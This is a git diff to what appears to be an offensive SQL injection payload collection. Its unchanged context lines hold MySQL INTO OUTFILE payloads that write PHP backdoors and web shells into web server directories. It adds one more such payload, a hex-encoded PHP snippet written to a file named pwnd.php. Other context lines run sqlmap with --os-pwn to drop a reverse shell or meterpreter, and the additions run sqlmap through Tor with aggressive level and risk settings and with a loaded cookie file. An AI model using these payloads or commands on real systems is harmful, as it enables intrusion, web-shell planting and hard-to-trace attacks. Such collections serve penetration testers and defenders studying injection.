diff --git a/SQL injection/MySQL Injection.md b/SQL injection/MySQL Injection.md index 88aaf92..4b3e4f8 100644 --- a/SQL injection/MySQL Injection.md +++ b/SQL injection/MySQL Injection.md @@ -122,4 +122,5 @@ OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) SELECT "" into outfile "C:\\xampp\\htdocs\\backdoor.php" SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY ' -1 UNION SELECT 0xPHP_PAYLOAD_IN_HEX, NULL, NULL INTO DUMPILE 'C:/Program Files/EasyPHP-12.1/www/shell.php' +[...] UNION SELECT 1,2,3,4,5,0x3c3f70687020706870696e666f28293b203f3e into outfile 'C:\\wamp\\www\\pwnd.php'-- - ``` diff --git a/SQL injection/README.md b/SQL injection/README.md index 80f6cc1..29b6926 100644 --- a/SQL injection/README.md +++ b/SQL injection/README.md @@ -138,6 +138,18 @@ Dropping a reverse-shell / meterpreter python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn ``` +Using TOR with SQLmap + +```powershell +sqlmap -u "http://www.target.com" --tor --tor-type=SOCKS5 --time-sec 11 --check-tor --level=5 --risk=3 --threads=5 +``` + +Using Chrome cookie and a Proxy + +```powershell +sqlmap -u "https://test.com/index.php?id=99" --load-cookie=/media/truecrypt1/TI/cookie.txt --proxy "http://127.0.0.1:8080" -f --time-sec 15 --level 3 +``` + Using suffix to tamper the injection ```powershell